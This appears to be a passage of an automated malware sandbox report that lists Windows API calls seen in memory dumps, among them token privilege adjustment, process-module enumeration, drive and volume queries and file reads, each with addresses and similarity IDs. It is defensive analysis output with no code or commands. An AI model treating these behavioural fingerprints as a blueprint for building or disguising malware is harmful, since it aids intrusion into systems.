                                                    • GetFileType.KERNELBASE(?,00000E9C,9A71A1F2,00000000,00000000,00000000,00000000), ref: 02820819
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02820502
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0282072D
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,9A71A1F2,00000000,00000000,00000000,00000000), ref: 028208E5
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 025DA94A
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 02820DD6
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,9A71A1F2,00000000,00000000,00000000,00000000), ref: 025DBDBC
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,9A71A1F2,00000000,00000000,00000000,00000000), ref: 025DB0AE
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 02820FB0
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleMode
                                                    • String ID:
                                                    • API String ID: 4145635619-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 025DAB1A
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 02821148
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,9A71A1F2,00000000,00000000,00000000,00000000), ref: 025DAFBE
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 025DBA7E
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,9A71A1F2,00000000,00000000,00000000,00000000), ref: 028208E5
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetErrorMode.KERNELBASE(?), ref: 025DA39C
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0282132F
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 02820640
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 025DAB1A
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 025DAA71
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 0282099C
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,9A71A1F2,00000000,00000000,00000000,00000000), ref: 02820819
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 025DABC9
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 025DBA7E
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 025DA23E
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleCtrlHandler
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 028201D0
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0282109E
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleMode
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0282132F
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 025DA94A
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02820502
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 02820FB0
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 02820640
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 025DABC9
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 02821148
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetErrorMode.KERNELBASE(?), ref: 025DA39C
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 0282099C
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 025DAA71
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 025DA9C8
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 025DA9C8
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182805896.00000000027E0000.00000040.00000040.sdmp, Offset: 027E0000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182805896.00000000027E0000.00000040.00000040.sdmp, Offset: 027E0000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2199283332.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181837173.00000000025D2000.00000040.00000001.sdmp, Offset: 025D2000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181837173.00000000025D2000.00000040.00000001.sdmp, Offset: 025D2000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Executed Functions

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000001E.00000002.2198852428.0000000000240000.00000040.00000001.sdmp, Offset: 00240000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID: fCl$fCl$fCl$fCl$fCl
                                                    • API String ID: 0-2453322616
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 0000001E.00000002.2198852428.0000000000240000.00000040.00000001.sdmp, Offset: 00240000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Executed Functions

                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 006DAD37
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 006DAD37
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 006DB329
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 006DB329
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 028001D0
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0280072D
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 02800DD6
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,9CD4697E,00000000,00000000,00000000,00000000), ref: 006DAFBE
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,9CD4697E,00000000,00000000,00000000,00000000), ref: 006DBDBC
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0280109E
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,9CD4697E,00000000,00000000,00000000,00000000), ref: 006DB0AE
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,9CD4697E,00000000,00000000,00000000,00000000), ref: 02800819
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 006DA23E
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleCtrlHandler
                                                    • String ID:
                                                    • API String ID: 1513847179-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02800502
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0280072D
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,9CD4697E,00000000,00000000,00000000,00000000), ref: 028008E5
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 006DA94A
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 02800DD6
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,9CD4697E,00000000,00000000,00000000,00000000), ref: 006DBDBC
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 02800FB0
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,9CD4697E,00000000,00000000,00000000,00000000), ref: 006DB0AE
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 006DAB1A
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleScreenBufferInfo.KERNEL32 ref: 006DBB2F
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: BufferConsoleInfoScreen
                                                    • String ID:
                                                    • API String ID: 3437242342-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 02801148
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,9CD4697E,00000000,00000000,00000000,00000000), ref: 006DAFBE
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,9CD4697E,00000000,00000000,00000000,00000000), ref: 028008E5
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 006DBA7E
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0280132F
                                                    Memory Dump Source
